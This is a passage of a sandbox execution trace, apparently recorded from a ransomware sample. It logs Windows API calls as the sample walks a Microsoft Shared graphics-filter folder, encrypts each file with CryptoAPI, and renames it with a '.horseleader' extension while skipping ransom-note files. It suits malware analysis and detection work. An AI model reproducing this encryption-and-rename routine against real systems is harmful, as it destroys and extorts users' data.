lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.072] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.072] CloseHandle (hObject=0x158) returned 1 [0228.072] GetProcessHeap () returned 0x780000 [0228.072] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.072] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.horseleader") returned 77 [0228.072] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.horseleader")) returned 1 [0228.073] GetProcessHeap () returned 0x780000 [0228.073] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.073] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x3adb, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MS.EPS", cAlternateFileName="")) returned 1 [0228.073] lstrcmpiW (lpString1="MS.EPS", lpString2="Windows") returned -1 [0228.073] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 65 [0228.073] StrStrIW (lpFirst="MS.EPS", lpSrch=".horseleader") returned 0x0 [0228.074] lstrcmpW (lpString1="MS.EPS", lpString2="#Decrypt#.txt") returned 1 [0228.074] lstrcmpW (lpString1="MS.EPS", lpString2="_uninstalling_.png") returned 1 [0228.074] lstrlenW (lpString=".testttjffg") returned 11 [0228.074] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", lpSrch=".testttjffg") returned 0x0 [0228.074] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.074] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.074] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.075] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 65 [0228.075] StrStrW (lpFirst="MS.EPS", lpSrch=".txt") returned 0x0 [0228.075] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=15067) returned 1 [0228.075] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3adb, lpOverlapped=0x0) returned 1 [0228.147] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc525, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.147] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3adb, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3adb, lpOverlapped=0x0) returned 1 [0228.148] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.148] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.148] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.148] CloseHandle (hObject=0x158) returned 1 [0228.148] GetProcessHeap () returned 0x780000 [0228.149] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.149] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.horseleader") returned 77 [0228.149] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.horseleader")) returned 1 [0228.150] GetProcessHeap () returned 0x780000 [0228.150] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.150] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x42d, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MS.GIF", cAlternateFileName="")) returned 1 [0228.150] lstrcmpiW (lpString1="MS.GIF", lpString2="Windows") returned -1 [0228.150] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 65 [0228.151] StrStrIW (lpFirst="MS.GIF", lpSrch=".horseleader") returned 0x0 [0228.151] lstrcmpW (lpString1="MS.GIF", lpString2="#Decrypt#.txt") returned 1 [0228.151] lstrcmpW (lpString1="MS.GIF", lpString2="_uninstalling_.png") returned 1 [0228.151] lstrlenW (lpString=".testttjffg") returned 11 [0228.151] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF", lpSrch=".testttjffg") returned 0x0 [0228.151] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.151] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.151] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.152] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 65 [0228.152] StrStrW (lpFirst="MS.GIF", lpSrch=".txt") returned 0x0 [0228.152] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1069) returned 1 [0228.152] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x42d, lpOverlapped=0x0) returned 1 [0228.178] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbd3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.178] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x42d, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x42d, lpOverlapped=0x0) returned 1 [0228.178] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.178] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.178] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.179] CloseHandle (hObject=0x158) returned 1 [0228.179] GetProcessHeap () returned 0x780000 [0228.179] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.179] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.horseleader") returned 77 [0228.179] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif.horseleader")) returned 1 [0228.180] GetProcessHeap () returned 0x780000 [0228.180] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.180] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x425, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MS.JPG", cAlternateFileName="")) returned 1 [0228.180] lstrcmpiW (lpString1="MS.JPG", lpString2="Windows") returned -1 [0228.180] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 65 [0228.180] StrStrIW (lpFirst="MS.JPG", lpSrch=".horseleader") returned 0x0 [0228.180] lstrcmpW (lpString1="MS.JPG", lpString2="#Decrypt#.txt") returned 1 [0228.180] lstrcmpW (lpString1="MS.JPG", lpString2="_uninstalling_.png") returned 1 [0228.180] lstrlenW (lpString=".testttjffg") returned 11 [0228.180] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpSrch=".testttjffg") returned 0x0 [0228.180] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.180] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.181] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.182] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 65 [0228.182] StrStrW (lpFirst="MS.JPG", lpSrch=".txt") returned 0x0 [0228.182] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1061) returned 1 [0228.182] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x425, lpOverlapped=0x0) returned 1 [0228.202] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbdb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.202] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x425, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x425, lpOverlapped=0x0) returned 1 [0228.202] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.202] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.202] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.202] CloseHandle (hObject=0x158) returned 1 [0228.203] GetProcessHeap () returned 0x780000 [0228.203] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.203] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.horseleader") returned 77 [0228.203] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.horseleader")) returned 1 [0228.204] GetProcessHeap () returned 0x780000 [0228.204] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.204] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x692, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MS.PNG", cAlternateFileName="")) returned 1 [0228.204] lstrcmpiW (lpString1="MS.PNG", lpString2="Windows") returned -1 [0228.204] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 65 [0228.204] StrStrIW (lpFirst="MS.PNG", lpSrch=".horseleader") returned 0x0 [0228.204] lstrcmpW (lpString1="MS.PNG", lpString2="#Decrypt#.txt") returned 1 [0228.204] lstrcmpW (lpString1="MS.PNG", lpString2="_uninstalling_.png") returned 1 [0228.204] lstrlenW (lpString=".testttjffg") returned 11 [0228.204] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpSrch=".testttjffg") returned 0x0 [0228.204] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.204] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.204] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.205] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 65 [0228.205] StrStrW (lpFirst="MS.PNG", lpSrch=".txt") returned 0x0 [0228.205] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1682) returned 1 [0228.205] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x692, lpOverlapped=0x0) returned 1 [0228.238] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff96e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.238] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x692, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x692, lpOverlapped=0x0) returned 1 [0228.238] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.238] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.238] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.238] CloseHandle (hObject=0x158) returned 1 [0228.239] GetProcessHeap () returned 0x780000 [0228.239] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.239] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.horseleader") returned 77 [0228.239] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.horseleader")) returned 1 [0228.240] GetProcessHeap () returned 0x780000 [0228.240] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.240] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MS.WPG", cAlternateFileName="")) returned 1 [0228.240] lstrcmpiW (lpString1="MS.WPG", lpString2="Windows") returned -1 [0228.240] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 65 [0228.240] StrStrIW (lpFirst="MS.WPG", lpSrch=".horseleader") returned 0x0 [0228.240] lstrcmpW (lpString1="MS.WPG", lpString2="#Decrypt#.txt") returned 1 [0228.240] lstrcmpW (lpString1="MS.WPG", lpString2="_uninstalling_.png") returned 1 [0228.240] lstrlenW (lpString=".testttjffg") returned 11 [0228.240] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG", lpSrch=".testttjffg") returned 0x0 [0228.240] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.240] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.241] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.241] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 65 [0228.241] StrStrW (lpFirst="MS.WPG", lpSrch=".txt") returned 0x0 [0228.241] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1382) returned 1 [0228.241] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x566, lpOverlapped=0x0) returned 1 [0228.253] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa9a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.253] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x566, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x566, lpOverlapped=0x0) returned 1 [0228.254] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.254] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.254] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.254] CloseHandle (hObject=0x158) returned 1 [0228.255] GetProcessHeap () returned 0x780000 [0228.255] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.255] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.horseleader") returned 77 [0228.255] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg.horseleader")) returned 1 [0228.256] GetProcessHeap () returned 0x780000 [0228.256] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.256] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x11d78, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="PICTIM32.FLT", cAlternateFileName="")) returned 1 [0228.256] lstrcmpiW (lpString1="PICTIM32.FLT", lpString2="Windows") returned -1 [0228.256] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 71 [0228.256] StrStrIW (lpFirst="PICTIM32.FLT", lpSrch=".horseleader") returned 0x0 [0228.256] lstrcmpW (lpString1="PICTIM32.FLT", lpString2="#Decrypt#.txt") returned 1 [0228.256] lstrcmpW (lpString1="PICTIM32.FLT", lpString2="_uninstalling_.png") returned 1 [0228.256] lstrlenW (lpString=".testttjffg") returned 11 [0228.257] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT", lpSrch=".testttjffg") returned 0x0 [0228.257] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.257] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.257] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: 